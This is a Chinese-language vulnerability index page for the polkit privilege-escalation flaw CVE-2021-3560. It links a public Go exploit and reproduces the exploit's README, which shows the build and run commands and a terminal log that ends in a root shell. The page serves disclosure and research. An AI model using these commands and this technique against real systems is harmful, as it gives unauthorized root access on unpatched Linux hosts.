CVE-2021-3560 PoC — polkit 代码问题漏洞

来源

https://github.com/RicterZ/CVE-2021-3560-Authentication-Agent

关联漏洞

标题:polkit 代码问题漏洞 (CVE-2021-3560)
Description:polkit是一个在类 Unix操作系统中控制系统范围权限的组件。通过定义和审核权限规则，实现不同优先级进程间的通讯。 polkit 存在代码问题漏洞，该漏洞源于当请求进程在调用polkit_system_bus_name_get_creds_sync之前断开与dbus-daemon的连接时，该进程无法获得进程的唯一uid和pid，也无法验证请求进程的特权。

Description

PolicyKit CVE-2021-3560 Exploit (Authentication Agent)

介绍

PolicyKit CVE-2021-3560 Exploit  (Authentication Agent)
====

### Technology Details
Blog posts about this exploit : 
- https://ricterz.me/posts/2022-04-28-a-new-exploit-method-for-cve-2021-3560-polkit-linux-privilege-escalation.txt
- http://noahblog.360.cn/a-new-exploit-method-for-cve-2021-3560-policykit-linux-privilege-escalation

## Build & Usage
```
nobody@test:/tmp/CVE-2021-3560$ go build
nobody@test:/tmp/CVE-2021-3560$ ./CVE-2021-3560 ./pwnkit.service
=== polkit CVE-2021-3560 exploit - RicterZ @ 360 Noah Lab ===
pid-267920 - [*] Registering PolicyKit authentication agent ...
...
pid-267915 - [-] Exploit failed, please try again
nobody@test:/tmp/CVE-2021-3560$ ./CVE-2021-3560 ./pwnkit.service
=== polkit CVE-2021-3560 exploit - RicterZ @ 360 Noah Lab ===
pid-267963 - [*] Registering PolicyKit authentication agent ...
pid-267963 - [*] Authentication agent main loop running ...
pid-267968 - [*] Registering PolicyKit authentication agent ...
pid-267973 - [*] Registering PolicyKit authentication agent ...
pid-267968 - [*] Authentication agent main loop running ...
pid-267973 - [*] Authentication agent main loop running ...
pid-267963 - [*] Starting systemd service 'pwnkit.service' ...
pid-267968 - [*] Enabling systemd unit file '/tmp/pwnkit.service' ...
pid-267973 - [*] Reloading systemd daemon ...
pid-267963 - [+] Received authentication request for action: 'org.freedesktop.systemd1.manage-units'
pid-267963 - [*] Cookie: 100-9b8357901e7f4f4847cbd15a3d191cc4-1-10167c9df23ebe27c57534750f48ef7a
pid-267968 - [+] Received authentication request for action: 'org.freedesktop.systemd1.manage-unit-files'
pid-267968 - [*] Cookie: 101-48273279f75230e86c9ad5df212ee54d-1-a86a81adcf07ad16ab6017a21235da80
pid-267973 - [+] Received authentication request for action: 'org.freedesktop.systemd1.reload-daemon'
pid-267973 - [*] Cookie: 102-3fb9b174b470f5d04881cbfeb16a60d0-1-8a36d3a7f9aca22af0a0f8562f20dbe2
pid-267958 - [+] File exists, popping root shell ...
pwned-5.0# id
uid=65534(nobody) gid=65534(nogroup) euid=0(root) egid=0(root) groups=0(root),65534(nogroup)
```

## License
Apache License

文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看

备注

1. 建议优先通过来源进行访问。

2. 本地 POC 快照面向订阅用户开放；当原始来源失效或无法访问时，本地镜像作为订阅权益的一部分提供。

查看订阅方案 →

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

CVE-2021-3560 PoC — polkit 代码问题漏洞

来源

关联漏洞

Description

介绍

文件快照

备注

目标达成感谢每一位支持者 — 我们达成了 100% 目标！